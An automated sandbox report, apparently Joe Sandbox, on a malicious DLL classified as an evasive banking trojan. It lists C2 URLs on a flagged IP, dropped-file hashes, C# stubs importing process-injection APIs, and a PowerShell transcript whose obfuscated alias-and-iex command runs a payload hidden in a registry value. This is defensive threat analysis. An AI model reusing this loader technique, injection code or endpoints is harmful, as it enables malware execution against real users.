                      http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2 | rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://constitution.org/usdeclar.txt | rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://crl.micro | powershell.exe, 00000012.00000003.416780801.000001E636303000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.559953766.000001E636304000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2 | rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      185.189.151.28 | unknown | Switzerland | | 51395 | AS-SOFTPLUSCH | true
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:620332
Start date and time: 2022-05-04 16:25:58 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 32s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:xaj0e933Uv.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 38
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@25/17@0/1
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 19.9% (good quality ratio 19.1%)
                      • Quality average: 82.2%
                      • Quality standard deviation: 27.1%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.43.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 6548 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
16:27:23 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
16:28:07 | API Interceptor | 36x Sleep call for process: powershell.exe modified
                      No context
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):11606
                      Entropy (8bit):4.8910535897909355
                      Encrypted:false
                      SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                      MD5:F84F6C99316F038F964F3A6DB900038F
                      SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                      SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                      SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                      Malicious:false
                      Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1192
                      Entropy (8bit):5.325275554903011
                      Encrypted:false
                      SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                      MD5:05CF074042A017A42C1877FC5DB819AB
                      SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                      SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                      SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                      Malicious:false
                      Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.9748061757983675
                      Encrypted:false
                      SSDEEP:24:HTe9EuZf4UzDfHUhKdNWI+ycuZhN6xakSl2PNnq9qd:6B4oGKd41ulQa3cq9K
                      MD5:B25228E0D789A80CC458BDEDCA074352
                      SHA1:D02F77745E89EDE624F705B49991653478861CDE
                      SHA-256:AB6DDC0161E42079AAE33ED2D5CCF08861E963F50203059A1B641D41CA9E5951
                      SHA-512:471FF8CBFD71FE1088146FB506BCDC2120CB1515298F68644F898D49205EEA7F198A97AECC990E6438216F0798B785D2B31CBC597AA2180802AA0B0A53491E62
                      Malicious:false
                      Preview:L...~.rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP................'...4..0...."..b..........4.......C:\Users\user\AppData\Local\Temp\RES5F15.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.9834931582727697
                      Encrypted:false
                      SSDEEP:24:H5e9EuZfO5XDfH+hKdNWI+ycuZhN9akS7PNnq9qd:wBO5z0Kd41ul9a3xq9K
                      MD5:3216E688A820A84F56F4B051422672D5
                      SHA1:66A45E83433BA569C1539A55EE95B8715BF3CDB9
                      SHA-256:E6B505EA1803ACB819A72DA55DA55A8A45047CB9F64D02682F7B0FB190372B29
                      SHA-512:2598C34B7B84CA677422F49B86FD1D96672987E4D9CA6B4DA2392E336B0B458B914C635D059A3F0CA302B14CC1BDD06ADF374EA095B9051011B42558CAC37297
                      Malicious:false
                      Preview:L.....rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP................GgU.V...?.FQ.n...........4.......C:\Users\user\AppData\Local\Temp\RES73F5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.1141398576088117
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7Ynqq7PN5Dlq5J:+RI+ycuZhN9akS7PNnqX
                      MD5:476755BF56A208B33F9C4651A06EE5A5
                      SHA1:828C47F319540793ABFD06234431820E5594A420
                      SHA-256:EB5CB6796AF4525D3264AC6A5E123A6D682A1C8431FAFC244EAD44DA8046F91C
                      SHA-512:4B7FA176700A57354909997E6F70515F57BB61EBADE429B16262BA5BA8C90755F068EB6AF13954BB3FD39911D27DFAAC6C94A10B90F20CAFA1DE647D84F69C42
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.1.g.x.k.o.1.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):392
                      Entropy (8bit):4.988829579018284
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                      MD5:80545CB568082AB66554E902D9291782
                      SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                      SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                      SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.283593156851968
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fp1vOBzxs7+AEszIwkn23fp1vOM:p37Lvkmb6KRfBAWZEifB9
                      MD5:9BA74AF8C7DB03DB598E428C80A39C24
                      SHA1:1118FB7E3A74DEDA5A4E7C1C7D1B054CBE5C6E1C
                      SHA-256:29709DDB56A51411468E1EF4A5C98A0CFC749ACB37E58B6BD3574F0F2D302722
                      SHA-512:6B24DA377F68A32BCBD70C00CCCB521CB67A6353A2BD06E7C811A50E67F2BD83F3F79BA9CFCE53747E3F507453EF1E12734BBF9BF3FA413A8827BDA4EB3F66D9
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.600576810696372
                      Encrypted:false
                      SSDEEP:24:etGSa/u2Bg85z7xlfwZD6lgdWqtkZf3rtWI+ycuZhN9akS7PNnq:6fYb5hFCD6wWdJ3rY1ul9a3xq
                      MD5:DB32AF94E50432F083E1DEA228EEF8D4
                      SHA1:7BA5E52289B5D9BBAEB3647F32315FB9AFE0BE9E
                      SHA-256:C91C4DB3E42338BB928B22C4207308E4153D45AEC8F734030CED671F0EAE83BD
                      SHA-512:7AFE704910CF7B27D4D9F756F18B47A159C474B6868378CE68EE105D63AF3E0F5CEEC1DEA5539CFED4DA1E76DA73DA353D16319E63E9F200493486314BDC3C75
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.346663629193138
                      Encrypted:false
                      SSDEEP:24:AId3ka6KRfDEifeKaM5DqBVKVrdFAMBJTH:Akka6CDEueKxDcVKdBJj
                      MD5:2F9D5A7D317AB29D714CEFE888F56699
                      SHA1:2DE49F06FDE6EAD8ED5886B017B874FAFBCD6356
                      SHA-256:728FA4B4FD272923E395304FA5B40B1F2F98C4D39B88F1BCEDCF81287C9F4EFB
                      SHA-512:6591BE1739BFA8EB5998A6679F865EE3A07363FFA028E0317B73F79ECAEA7675B4BCC16086B425EE74B422898E98874C7C803C5ADB00FD71088CB007A5017069
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.093636689580821
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycxak7Ynqql2PN5Dlq5J:+RI+ycuZhN6xakSl2PNnqX
                      MD5:27A58DEC34A8A930EAF493E122C1D762
                      SHA1:84E4A3CA94FA31FF623DE9EE39782AC021D93B32
                      SHA-256:C9EEA11CDD016DF97932732100DF2AE3F3250F3C49A9270F0BA04F444096B665
                      SHA-512:D267C3F6B444275A3B32A42010F7352D7DC5098A10A5B0A5FAD5D7E0B79F286BD5BC45B9D94BE1A07B65195B9D90CCE58FE4E2F9E93E708C41702CE97F1F3074
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.5.p.o.d.5.s.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):403
                      Entropy (8bit):5.058106976759534
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                      MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                      SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                      SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                      SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.182200628670966
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f52wn0zxs7+AEszIwkn23f52sH:p37Lvkmb6KRfh2q0WZEifh2m
                      MD5:8CB0C7CD433BDC2F02299B6932B4A9E3
                      SHA1:00663A78D6DAD361F367FD49A112A56B5C7DFA2B
                      SHA-256:97DB1A8D4B63512E0C57B113E1F95D861B1FBE14D394B9888480BFB2AD6C3F13
                      SHA-512:3072FB0116DB38CBF12CBDBA7D6820DA0C401A7FD7BBB37ACA9564985A3C3F8363D54F0807E06FC2B94D2C9D2B2F94D7E7D74A5B40A1B2C0227CDE522CDBB902
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6207839132053006
                      Encrypted:false
                      SSDEEP:24:etGSo8OmU0t3lm85xWAseO4zxQ64pfUPtkZfi1VUWI+ycuZhN6xakSl2PNnq:6iXQ3r5xNOeQfUuJiT31ulQa3cq
                      MD5:1F0860CDD9E8F6B4501F25728D2131B6
                      SHA1:1126BDC01913B693028ECB663123381889362DA8
                      SHA-256:3CABCC304A4FA671400D71EBEB21F846983224F97AF93BE2CF2AADA6E3B3E34B
                      SHA-512:E8CD254CCF26A063BD36EF34299F7B9C86450E2A2ED9A958E77F05DE1C829470B0EE6129FA00745ED6A0D8DD9379DB384FF7F704BC5820BBC29A30C0A8F4BCA5
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.307968253776901
                      Encrypted:false
                      SSDEEP:24:AId3ka6KRfPVEif8KaM5DqBVKVrdFAMBJTH:Akka6CPVEu8KxDcVKdBJj
                      MD5:CEA73A1E9F1D1CC3A29CF5AAE996602A
                      SHA1:6BF6258A16B4750D4B37D33FF17D8FF99D11ADC9
                      SHA-256:C232D4309AA78DB4C1FA7E017FA57BFED2E1B05E10090C27DB13BAEB9EE41CC7
                      SHA-512:1125BFEC36CDE86F8C6DAC261F366C90723A22633D78C87C03B4048C45D009E18E7602CD9E22029B388E7B57DF0319143756D33449710CEECC21FEC822ED427A
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1343
                      Entropy (8bit):5.36590430076155
                      Encrypted:false
                      SSDEEP:24:BxSAI7vBZbx2DOXUWYJobduLCHdV4qWQHjeTKKjX4CIym1ZJXxJobduLCHdV4rN+:BZmvjboO4JobdRdV4tQqDYB1ZDJobdRb
                      MD5:3FD39DAE5C6C053C927C7C421DF22346
                      SHA1:648958C510D633CECD2033A0B76B04A2B8CA6993
                      SHA-256:733ABC0BC0C57B87100F55CA1BB3FDCE133B892BF619D86F1C11A2891C3E844E
                      SHA-512:8DC2BF906F650828FCE8EEC6D7C05B9D5B00DD8044CE5FBD1B7E0220220DBE646C37D118DD9CE6DD886E141EB4A691B43963C214665E03EFAEB55E3C86C5AA1C
                      Malicious:false
                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504162806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6644..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504162806..**********************..PS>new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.E
